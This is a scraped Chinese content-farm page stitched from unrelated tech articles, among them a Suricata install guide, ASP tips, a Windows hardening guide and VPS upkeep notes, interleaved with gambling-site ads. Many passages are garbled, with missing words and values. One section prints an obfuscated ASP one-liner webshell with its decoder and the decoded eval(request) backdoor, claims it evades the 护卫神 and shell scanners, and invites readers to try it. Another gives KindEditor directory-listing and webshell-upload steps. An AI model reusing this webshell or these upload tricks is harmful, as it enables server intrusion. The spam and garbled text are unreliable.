加有大量注释,如何在Linux上安装Suricata入侵检测系统?

By 刘栋宸 / On / In 行业资讯

  加有大量注释,如何在Linux上安装Suricata入侵检测系统?
  如何在Linux上安装Suricata入侵检测系统?
  由于安全威胁持续不断,配备入侵检测系统已成为如今数据中心环境下最重要的要求之一。然而,随着越来越多的服务器将卡升级到10GB/40GB以太技术,我们越来越难在大众化硬件上以线速实施计算密集型入侵检测。
  

本篇文章将演示如何在Linux服务器上安装和配置Suricata IDS。
  

不妨用源代码构建Suricata。你先要安装几个所需的依赖项,如下所示。
  

在Debian、Ubuntu或Linux Mint上安装依赖项
  

$ sudo apt-get install wget build-essential libpcre3-dev libpcre3-dbg automake autoconf libtool libpcap-dev li1-dev libyaml-dev zlib1g-dev libcap-ng-dev libjansson-dev
在CentOS、Fedora或RHEL上安装依赖项
  

$ sudo yum install wget libpcap-devel li-devel pcre-devel -c++ automake autoconf libtool make libyaml-devel zlib-devel file-devel jansson-devel nss-devel
一旦你安装了所有必需的程序包,现在可以安装Suricata了,如下所示。
  

首先,从 />这是配置的示例输出结果。
  

$ make
$ sudo make install
Suricata源代码随带默认的配置文件。不妨安装这些默认的配置文件,如下所示。
  

$ sudo make install-conf
正如你所知,要是没有IDS规则集,Suricata毫无用处。颇为方便的是,Makefile随带IDS规则安装选项。想安装IDS规则,运行下面这个命令即可。
  

$ sudo make install-rules
上述规则安装命令会从EmergingThreats安装可用的社区规则集的最新快照,并将它们存储在/etc/suricata/rules下。
  

现在就可以配置Suricata了。配置文件位于/etc/suricata/。使用文本编辑工具打开文件,以便编辑。
  

下面是一些基本的设置,供你开始入门。
  

“default-log-dir”关键字应该指向Suricata日志文件的位置。
  

default-log-dir: /var/log/suricata/
在“vars”这部分下面,你会找到Suricata使用的几个重要变量。“HOME”应该指向由Suricata检查的本地络。“!$HOME”指本地络以外的任何络。“XXX_PORTS”表明不同服务所使用的一个或多个端口号。请注意:不管使用哪个端口, Suricata都能自动检测HTTP流量。所以,正确指定HTTP_PORTS变量并不是很重要。
  

vars:
HOME: ""
EXTERNAL: "!$HOME"
HTTP_PORTS: "80"
SHELLCODE_PORTS: "!80"
SSH_PORTS: 22
“host-os-policy”这部分用来防范一些利用操作系统的络堆栈的行为来规避检测的常见攻击。作为一项应对措施,现代IDS想出了所谓的“基于目标的”检测,检查引擎根据流量的目标操作系统,对检测算法进行微调。因而,如果你知道每个本地主机运行什么操作系统,就可以将该信息提供给Suricata,从而有望提高其检测速度。这时候用到了“host-os-policy“部分。在该例子中,默认的IDS策略是Linux;如果不知道某个IP地址的操作系统信息,Suricata就会运用基于Linux的检查策略。如果捕获到/28和的流量,Suricata就会运用基于Windows的检查策略。
  

host-os-policy:
# 这些是Windows机器。
windows:
bsd:
bsd-right:
old-linux:
# 将Linux作为默认策略。
linux:
old-solaris:
solaris:
hpux10:
hpux11:
irix:
macos:
vista:
windows2k3:
在“threading”这部分下面,你可以为不同的Suricata线程指定CPU亲和性。默认情况下,CPU亲和性被禁用,这意味着Suricata线程将被安排在任何可用的CPU核心上。默认情况下,Suricata会为每个CPU核心创建一个“检测”线程。你可以调整这个行为,只要指定“detect-thread-ratio: N”。这会创建N x M个检测 线程,其中M是指主机上CPU核心的总数。
  

threading:
set-cpu-affinity: no
detect-thread-ratio:
就上述线程设置而言,Suricata会创建个检测线程,其中M是系统上CPU核心的总数。
  

想了解关于Suricata配置的更多信息,你可以阅读默认的配置文件本身,为了便于理解,加有大量注释。
  

现在可以试着运行Suricata了。在启动它之前,还有一个步骤要完成。
  

如果你使用pcap捕获模式,强烈建议关闭Suricata侦听的那个卡上的任何数据包卸载功能,因为那些功能可能会干扰数据包实时捕获。
  

下面介绍如何关闭络接口eth0上的LRO/GRO:
  

$ sudo ethtool -K eth0 gro off lro off
请注意:视使用的卡而定,你可能会看到下列警示信息,可以忽视这个信息。它只是意味着你的卡不支持LRO。
  

Cannot change large-receive-offload
Suricata支持多种运行模式。运行模式决定了不同的线程如何用于IDS。下面这个命令列出了所有可用的运行模式。
  

$ sudo /usr/local/bin/suricata –list-runmodes
Suricata使用的默认运行模式是autofp。在这种模式下,来自每一路流的数据包被分配给单一的检测线程。流被分配给了未处理数据包数量最少的线程。
  

最后,不妨启动Suricata,看看它的实际运行情况。
  

$ sudo /usr/local/bin/suricata -c /etc/suricata/-i eth0 –init-errors-fatal
  

在这个例子中,我们监控一个8核系统上的络接口eth0。如上所示,Suricata创建了13个数据包处理线程和3个管理线程。数据包处理线程包括1个PCAP数据包捕获线程和12个检测线程。这意味着,一个捕获线程捕获的数据包经负载均衡处理后,变成了IDS面前的12个检测线程。管理线程是一个流管理器和两个计数器/统计相关线程。
  

下面是Suricata进程的线程视图。
  

Suricata检测日志存储在/var/log/suricata目录下。
  

$ tail -f /var/log/suricata/
04/01/2015-15:47:{TCP}:22 ->:
04/01/2015-15:49:{TCP}:22 ->:
04/01/2015-15:49:{TCP}:22 ->:
为了易于导入,还有JSON格式的日志:
  

$ tail -f /var/log/suricata/
{"timestamp":"2015-04-01T15:49:06.","event_type":"alert","src_ip":"","src_port":22,"dest_ip":"","dest_port":,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":,"rev":1,"signature":"SURICATA TCPv4 invalid checksum","category":"","severity":3}}
  

{"timestamp":"2015-04-01T15:49:06.","event_type":"alert","src_ip":"","src_port":22,"dest_ip":"","dest_port":,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":,"rev":1,"signature":"SURICATA TCPv4 invalid checksum","category":"","severity":3}}
  

我在本教程中演示了如何在多核Linux服务器上安装一个Suricata IDS。不像单线程Snort IDS,Suricata轻松就能得益于采用多线程技术的多核硬件。想最大限度地提高性能、扩大检测覆盖范围,Suricata方面需要进行大量的定制工作。
  

你目前在使用Suricata吗?如果是的话,欢迎交流经验和心得!

然后用逗号’,JS中的==运算: [”] == false —>true

By 彭才瑷 / On / In 行业资讯

  然后用逗号’,JS中的==运算: [”] == false —>true
  这篇文章主要介绍了JS中的==运算: == false —>true的相关资料,非常不错,具有参考借鉴价值,需要的朋友可以参考下
  

首先,两个操作数分别是对象类型、布尔类型。根据图1,需要将布尔类型转为数字类型,而false转为数字的结果是0,所以表达式变为:
  

两个操作数变成了对象类型、数字类型。根据图1,需要将对象类型转为原始类型:
  

首先调用.valueOf,由于数组的valueOf方法返回自身,所以结果不是原始类型,继续调用.toString。
  

对于数组来说,toString方法的算法,是将每个元素都转为字符串类型,然后用逗号’,’依次连接起来,所以最终结果是空字符串”,它是一个原始类型的值。
  

两个操作数变成了字符串类型、数字类型。根据图1,需要将字符串类型转为数字类型,前面说了空字符串变成数字是0。于是表达式变为:
  

到此为止,两个操作数的类型终于相同了,结果明显是true。

同升国际注册即送38时尚时尚最时尚 进行替换

By 彭才瑷 / On / In 行业资讯

  同升国际注册即送38时尚时尚最时尚 进行替换
  

同升国际注册即送38时尚时尚最时尚

=keys让玩家随心所欲地玩转所有游戏,一直以来都深受玩家的青睐!
同升国际注册即送38为您提供所有在线娱乐相关信息以及最新优惠动态,现在注册送终生会员奖金服务并且还有顶级VIP服务!同升国际线路检测中心亚洲最棒的娱乐平台,全心全意的期待您的到来!!!您如果要了解更多同升国际注册即送38时尚时尚最时尚请查看同升国际娱乐网址
  KindEditor上传解析漏洞、列目录、内容漏洞
  KindEditor是一套开源的HTML可视化编辑器,主要用于让用户在站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器,但是安全问题也不容忽视,下面来简单分析下
  Kindeditor漏洞 编辑代码内容被执行

kindeditor漏洞描述:在kindeditor编辑代码添加到数据库时没有任何问题,也就是一些HTML代码不会被执行,例如:<a href="#">web编程</a>,这样的代码在首次编辑的时候没有被执行。但是,从数据库里取出来再放到kindeditor里进行修改的时候问题就出现了,这行HTML代码被执行了,结果这样:web编程 变成了超链接的形式。

解决办法:先看下面这张图

这张图是本站后台代码文件,我将从数据库里取出来的内容中的“&”进行了替换,替换成了实体“&amp;”。然后你再取修改之前插入的代码,就可以正常显示了。

特别注意:上图中我使用的是PHP语言来修改的,其他服务器端脚本语言思想是一样的,进行替换。

KindEditor上传解析漏洞

影响版本:<=

漏洞利用:利用windows 2003 IIS解析漏洞拿WEBSHELL

KindEditor列目录漏洞

测试版本:

://67cms/kindeditor/php/file_manager_?path=/
//path=/,爆出绝对路径D:AppServ67cmskindeditorphpfile_manager_
://67cms/kindeditor/php/file_manager_?path=AppServ//67cms/
//根据爆出的绝对路径,修改path的值为AppServ//67cms/
这时将遍历d:/AppServ//67cms/下的所有文件和文件名

上传修改拿shell漏洞

影响版本:
~

漏洞利用:
打开编辑器,将一句话改名为上传图片,
打开文件管理,进入“down”目录,跳至,最后一个图片既是我们上传的一句话
点击改名

打开谷歌浏览器的 审查元素

找到form表单

修改“jpg”为“asp”

名字修改为1 保存

一句话就生成了,连接地址为

/upfiles/down/

输入Name,ASP.NET MVC5验证系列之Fluent Validation

By 吴白菲 / On / In 行业资讯

  

输入Name,ASP.NET MVC5验证系列之Fluent Validation
  ASP.NET MVC5验证系列之Fluent Validation
  这篇文章主要为大家详细介绍了ASP MVC5验证系列之Fluent Validation,感兴趣的小伙伴们可以参考一下
  

前面两篇文章学习到了,服务端验证,和客户端的验证,但大家有没有发现,这两种验证各自都有弊端,服务器端的验证,验证的逻辑和代码的逻辑混合在一起了,如果代码量很大的话,以后维护扩展起来,就不是很方便。而客户端的验证,必须要启用客户端验证,也就是在配置文件中配置相应的节点,并且还要引入Jquery插件。如果人为的在浏览器上,禁用了js脚本,那么客户端验证就不起作用了,所以在这里,我将继续学习另外一个验证,也就是Fluent Validation。
  

Fluent Validation是一个开源的类库,它使用Fluent接口和lambda表达式,来为实体做验证。Fluent Validation是专门为实体做验证使用的。它的优点是:把验证逻辑和你代码的业务逻辑分别开了。这就是AOP的思想。就是横切关注点。你只需要关注某一个模块。这样就保证了代码的纯洁度。
  

Fluent Validation开源地址: />
  Aspect-oriented program is a new software development paradigm that enables modular implementation of cross-cutting concerns,and poses difficulties for slicing of aspect-
  面向方面程序设计作为一种新的软件开发范型,能够实现横切关注点的模块化,其特有的语言元素和功能为切片增加了难度。
  好了,废话太多,直接进入正题,
  首先我们新建一个空白的MVC项目:在Model文件夹下新建一个类Customer:
  namespace Server_Side_Validation_IN_
  public string Name { get; set; }
  public string Email { get; set; }
  

然后新建一个文件夹Validator,在里面添加一个类CustomerValidator
  

既然是要使用Fluent Validation,那么就是要引用它的类库了。
  

CustomerValidator类中,继承AbstractValidator抽象类,
  using Server_Side_Validation_IN_;
  namespace Server_Side_Validation_IN_
  public class CustomerValidator:AbstractValidator<Customer>
  using Server_Side_Validation_IN_;
  namespace Server_Side_Validation_IN_
  public class CustomerController : Controller
  CustomerValidator validator = new CustomerValidator;
  

修改一下,默认的路由:
  public static void RegisterRoutes
  

什么都不输入,直接点击Create:
  

输入Name,Email输入非法的数据
  

这里就完成了Fluent Validation验证。大家可以看到,这样的验证是不是干净简洁多了,配置信息都在一个类中,方便维护和扩展。不想数据注解那样,把验证信息和实体混合了。
  

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持。

如何解决问题,aunps2.dll 手动删除方法

By 赵枫范 / On / In 行业资讯

  如何解决问题,aunps2.dll 手动删除方法
  部分的寄生虫/恶意软件。这里给出手动删除方法,如何解决问题
  

This file is not available for download,
  

#####
# Instructions:
#####
  

点击 开始 > 运行
输入regedit
定位到 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
在右边的框中删除如下内容:
"AUNPS2" = ",_Run@16"
关闭注册表
重启电脑即可

adOpenStatic,ASP编码必备的8条原则

By 丁成川 / On / In 行业资讯

  adOpenStatic,ASP编码必备的8条原则
  本文介绍的是用ASP编写代码的时候,我们应该遵守的八个原则。希望对你有帮助,一起来看吧!
  

ASP是Active Server Page的缩写,意为“动态服务器页面”。ASP是微软公司开发的代替CGI脚本程序的一种应用,它可以与数据库和其它程序进行交互,是一种简单、方便的编程工具。在这里仅就代码优化进行一些简单讨论。
  

在ASP中,对vbscript提供了强劲的支持,能够无缝集成vbscript的函数、方法,这样给扩展ASP的现有功能提供了很大便利。由于ASP中已经模糊了变量类型的概念,所以,在进行ASP与vbscript交互的过程中,很多程序员也惯于不声明vbscript的变量,这样加重了服务器的解析负担,进而影响服务器的响应请求速度。
  

鉴于此,我们可以象在VB中强制用户进行变量声明一样在vbscript中强制用户进行变量声明。实现方法是在ASP程序行首放置<% option explicit%>。
  

在我们使用asp动态生成一个带参数URL地址并进行跳转时,在IE中解析很正常,但許crape浏览时却有错误如下:
  

解决方法是对生成的URL参数使用ASP内置server对象的URLencode方法进行URL编码,例子如下:
  

当使用完对象后,首先使用Close方法来释放对象所占用的系统资源;然后设置对象值为“nothing”释放对象占用内存。当年,我就是在一张页面上创建了百余个没有清空对象的记录集而崩溃了我的IIS 。下面的代码使用数据库内容建立一个下拉列表。代码示例如下:
  <% myDSN=”DSN=xur;uid=xur;pwd=xur”
  mySQL=”select * from authors where AU_ID<100″
  

使用字符串来建立查询并不能加快服务器的解析速度,相反,它还会增加服务器的解析时间。但在这里仍然推荐使用字符串代替简单的查询语句来进行查询。这样做的好处是,可以迅速发现程序问题所在,从而便利高效地生成程序。示例如下:
  mySQL= mySQL & “from publishers”
  mySQL= mySQL & “where state=’NY'”
  

在进行条件选择的时候,尽量使用case语句,避免使用if语句。使用case语句,可以使程序流程化,执行起来也比if语句来的快。示例如下:
  

6、使用文件中定义的常量打开记录集
  

打开记录集时,可以定义记录集打开的游标类型和锁定类型。
  

在文件中定义了一些常量来定义这些类型。文件保存在\pub\iissamples\IISamples目录下面。下面列举几个常用的游标类型和锁定类型。
  adOpenKeyset游标可向前或者向后,如一用户添加记录,新记录不会出现在记录集中;
  adOpenStatic记录集不对其他用户造成的记录修改有所反映。
  adLockReadOney不能修改记录集中的记录;
  adLockPessimistic在编辑一条记录时锁定它;
  adLockOptimstic调用记录集Update方法时才锁定记录;
  adLockBatchOpeimstic记录只能成批更新。
  <!–#INCLUDE VIRTUAL=”/” –>
  connectme=”DSN=xur;uid=xur;pwd=xur”
  sqltemp=”select * from publishers where name=’xur'”
  , connectme, adOpenStatic,adLockOptimstic
  & ” records in<br>” & sqltemp
  

7、避免在使用文件中进行对象定义
  

由于文件中的内容可以为站点内所有文件引用,无疑,在文件中进行对象定义可以省去很多重复工作。
  

比如在中的application_onstart函数中进行如下定义:
  

这样就可以在站点任何代码中做类似引用:
  mySQL=”select * from publishers where state=’xur’
  

同样地,可以在session_onstart函数中创建记录集对象
  

然后在站点也面中进行如下引用:
  mySQL=”select * from publishers where state=’xur’
  

但这样做的同时也有很大的负面影响,由于Application和session变量都只有在关闭站的时候才释放占用的资源,所以session参数会浪费大量不必要内存,而且此时application变量成为服务器性能的瓶颈。
  

建立定义对象asp页面,在需要进行调用这些对象的页面上,引入这张asp页面。假设定义对象的asp页面名称为,则只要在对应asp页面中加入以下语句就能引入该页面。
  

<!–#INCLUDE VIRTUAL=”/” –>
  在进行页面引进时,最好在待引进的asp文件中不要包含<%@LANGUAGE=”VBSCRIPT”%>语句。因为在asp文件中,只能有一句由@来定义的脚本解析语言。
  

asp提供了很好的代码保护机制,所有的asp代码都在服务器端执行而只返回给客户端代码执行结果。即便这样,在老版本的IIS中还可以在文件名后面家::$DATA来查看asp的源代码,这已经属于Web Server安全范畴不在本文讨论范围内。下面提出两点简单的安全注意事项。
  

虽然在asp中建议引入文件以inc作为扩展名,在这里仍建议以asp作为引文件的扩展名。当这些代码在安全机制不好的Web Server上运行时,只需在地址栏上输入引入文件的地址,就可以浏览该引入文件的内容,这是由于在Web Server上,如果没有定义好解析某类型的动态连接库时,该文件以源码方式显示。
  

不要把数据库文件放在站结构内部,这样,当恶意人士获取数据库路径后,就可以轻易获取该数据库,进而肆意更改数据库内容。比较好的做法是,为数据库建立DSN,而在进行数据库访问时直接访问该DSN。
  

通过本文关于ASP编码的八条原则介绍,希望能够给你带来帮助。

当然,制作一个百毒不侵的系统 无需安装杀毒软件

By 赵本定 / On / In 技术文章

  
当然,制作一个百毒不侵的系统 无需安装杀毒软件
  本文主要介绍了不装杀毒软件如何制作一个百毒不侵的系统,页病毒、U盘病毒再也威胁不到你的系统了,快点来学习吧
  在电脑配置并不高的机子上,不安装杀毒软件肯定效率要高得多。本人两年多不用杀毒软件也并没有病毒染身的原因。说白了就是以用户身份上!而不是管理员身份。下面说一下怎么以用户方式上。
1、安装系统后,首先把所有分区都转化成NTFS格式,很重要哦。不要说不会啊,就是单击开始按钮——>运行.输入 "convert c: /fs:ntfs ",可以把C盘转换成NTFS格式,不过要重启才能转换哦,其它盘就把C:改成相应的盘符就行了.
2、在控制面板中打开"用户帐号",将Administrator修改密码,尽量复杂些,不一定要记得.再创建一个计算机管理员用户和受限用户,管理员用户一定要密码,且也要复杂一些,这个密码要记住.因为以后装软件,游戏要用上.当然,记不住可以在DOS下改.
3、设置好后,进入创建的计算机管理员用户,打开“我的电脑”,单击“工具”——>“文件夹选项”,点击第二个选项卡“查看”,把里面的“使用简单文件共享”前的勾去掉。这个是以后打开文件夹或文件的属性时会出现“安全”选项卡。
4、把所有分区属性的“安全”选项卡中“users”用户去掉。这是它默认有一个特殊权限,可以在分区下或文件夹内创建文件夹。再可以创建或保存文件,这可能给病毒可乘之机。所以去掉。还有一个是“everyone".也去掉。添加创建的受限用户进去,权限是”只读”。
5、个别文件的权限问题:象QQ、游戏都需要完全权限,所以在计算机管理员用户中要给受限用户完全权限。QQ最好把与QQ程序在一起的文件给只读权限,防止木马替换QQ及相关的DLL文件。
6、在“运行”中输入“REGEDIT”,打开注册表,把里面的或的权限设为只读。防止病毒利用此处启动。
7、清理上缓存及临时文件,上时,一般缓存放在C:\Documents and Settings\用户名Local Settings\Temporary Inte Files中,这也是病毒藏匿的地方,还有就是C:\Documents and Settings\用户名Local Settings\Temp 下的临时文件。很多程序要用到这个地方。病毒也喜欢藏在这里,所以,在开机时,用批命令清空这两个文件夹。让病毒无处藏身。批命令为:
del C:\docume~1\用户名Locals~1\Tempor~1\*.*
del C:\Docume~1\用户名Locals~1\Temp\*.*
当然还可以把History和Cookies都清空。
做一个批命令文件,放到开始菜单中的“启动”项中。
这样也就做好了受限用户上的准备工作,上的病毒已经无法感染你的系统,也无法更改系统文件,对其它分区也无权更改,这样U盘病毒也无关紧要,因为病毒无法写入分区根目录下。页病毒无法更改系统文件,再凶的页病毒也无能为力了。
当然,此种方式对狂安装软件的人不适合,要想试用软件,如果不安装杀毒软件,最好利用虚拟机,象VMware和Virtual PC。对于只下音乐或电影的,没什么影响。

boln.dll 手工删除方法

By 彭宝方 / On / In 技术文章

  boln.dll 手工删除方法
  是一个病毒危险文件,这里简单介绍下手工删除方法,需要的朋友可以参考下
  当心!该文件被报告为间谍软件!请谨慎使用!

This file is part of spyware/’re doing!

间谍软件名称:
版本:
文件大小:
文件语言:

一句话木马加密 过护卫神云查杀系统 过shell扫描器

By 谢承蔼 / On / In 技术文章

  一句话木马加密 过护卫神云查杀系统 过shell扫描器
  这个一句话木马最近被利用的很多,很多扫描工具扫描不到,不过一些asp版的扫描工具支持扫描eval和execute,如果发现如下代码,请删除,下面就是他们常发的木马后门
  

分享给大家 暂时未测试 大家自己用用看

大马的代码是简单加密了下的!很容易解开看见 是加密的一段代码

复制代码代码如下:
<%
codeds=”Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li”
execute )
Function DeCode
On Error Resume Next
For i = 1 To Len
Curchar = Mid
If Asc = 16 then
Curchar = chr
Elseif Asc = 24 then
Curchar = chr
Elseif Asc = 32 then
Curchar = chr
Else
Curchar = chr -3)
End if
DeCode = Decode&Curchar
Next
End Function
)
%>

很简单的加密,解开一看

复制代码代码如下:
<%
If request =”x” then eval request end if
%>

经过测试,发现过目前的护卫神云查杀系统,这个貌似用的人挺多的

值得信赖的同升国际注册即送58 不负责维护

By 潘曾波 / On / In 技术文章

  值得信赖的同升国际注册即送58 不负责维护
  

值得信赖的同升国际注册即送58

同升国际注册即送58在线娱乐打造全球最优秀的娱乐城!
同升国际注册即送58让您体验游戏视频流畅不卡牌、存取款秒到账、美女荷官赏心悦目!同升国际注册送58欢迎您开户体验畅爽游戏!
在线娱乐就要选择登录s8s同升国际网址,在这里您可以轻松找到您喜欢的每一款游戏,还不马上行动?您如果要了解更多值得信赖的同升国际注册即送58请查看同升国际娱乐网址
  VPS的价格比起共享空间还是要贵出不少的,较高成本的投入下也值得花更多的功夫去维护,以下我们整理了VPS日常维护中的一些要点总结,需要的朋友可以参考下:
  

我们发现不少用户朋友并不重视对自己vps的维护工作,甚至有一些朋友把站搭建好后就什么都不管了,vps长期处于没人维护的状态,出问题后就骂服务商垃圾。服务商只负责解决用户问题,不负责维护,vps的日常维护工作还需要用户朋友亲自去做。vps的维护工作非常重要,下面浅谈一下不重视vps维护的影响。
  

想要vps能够长期稳定运行,就必须做好vps的维护工作,否则会经常出现问题。不维护容易出现垃圾过多、安全性低容易被入侵等问题,这样会严重影响到vps的正常运行,所以用户在开通vps后需要安排有一定专业知识的技术人员对vps进行维护,个人站长可以自己维护,不知道怎么维护的朋友可以找代维商帮忙维护,同时自己可以学习怎么去维护vps,降低维护成本,减轻用户的经济压力。
  

vps的维护工作并不是简单在vps上安装一个杀毒软件就完事了,还包括系统安全、超级管理员账号密码安全、程序软件安全、端口安全、权限安全等工作。开通vps后要马上修改登录账号密码,再设置陷阱账号,新设的密码应尽可能复杂,不可太简单,而且要对密码进行定期修改,避免被黑客暴力破解;定期检查系统漏洞,并及时给漏洞打上补丁,另外还需要定期升级病毒库;安装正版程序软件,并及时把程序软件升级到最新版本;修改重要端口,关闭不必要端口和服务,并设置一些硬盘、站的读写权限,做一下防提权设置等。
  

尤其对于我们VPS新手站长来说在选择VPS主机之后可能仅仅安装一个WEB面板,然后就搭建站,后面就可能看天意不会出现问题我们也安稳的运行着站。如果一旦出现问题我们可能束手无策,抱怨商家如何,面板如何,其实很多时候我们在用VPS的时候也是需要有一定的维护和监控的。
  

第一、检查内存使用情况

复制代码代码如下:free -m
用该命令检测内存的占用、使用情况,如果CPU高了,我们需要检查是否因为站访问量大导致的正常升高,这时候就需要升级配置更高的CPU资源,如果非正常原因我们就需要检查是不是有被攻击或者是其他原因造成的负载超高。
  

第二、检查站访问日志
从站日志中不仅可以看到站的搜索引擎的爬行情况,也可以看到是否用户正常的访问还是有被不明来路的恶意访问,如果我们使用的是LNMP或者LLSMP可以分别使用"开启LNMP站访问日志 分析站日志文件"和"设置LiteSpeed日志选项 开启站访问日志文件"开启日志功能,然后下载到本地进行分析。
  

第三、检查硬盘使用情况
通过df -hl检查硬盘分区的使用情况,随着站的运行时间积累,可能会产生很多的缓冲文件以及站的数据不断增加,我们需要检查是否有需要清空缓冲文件或者升级硬盘。
  

第四、检查VPS主机系统负载和运行状态
通过uptime或者探针文件页面,可以观察VPS主机的运营时间情况,是否有出现宕机等问题,我们也可以用一些免费或者付费的监控工具,如果有宕机可以邮件或者短信发送过来给我们及时的处理。
  

第五、定期备份站数据
不管我们是用定时自动备份,还是定期人工手工备份,VPS主机与虚拟主机不同,我们需要做好自己备份数据,可能虚拟主机还有商家给我们定期备份,但最好的还是自己备份。这样防止商家跑路、VPS挂掉无法恢复、各种可能存在的不确定原因,因为站数据是最为重要的。
总之,VPS主机可能让我们操心的比虚拟主机多一些,小编建议如果我们正规、长期持有的站,稍微购买稳定的机器,这样稍逊会稳定一些。